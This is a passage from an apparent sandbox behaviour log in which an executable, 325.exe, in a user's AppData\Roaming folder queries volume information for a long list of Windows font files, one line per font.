                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
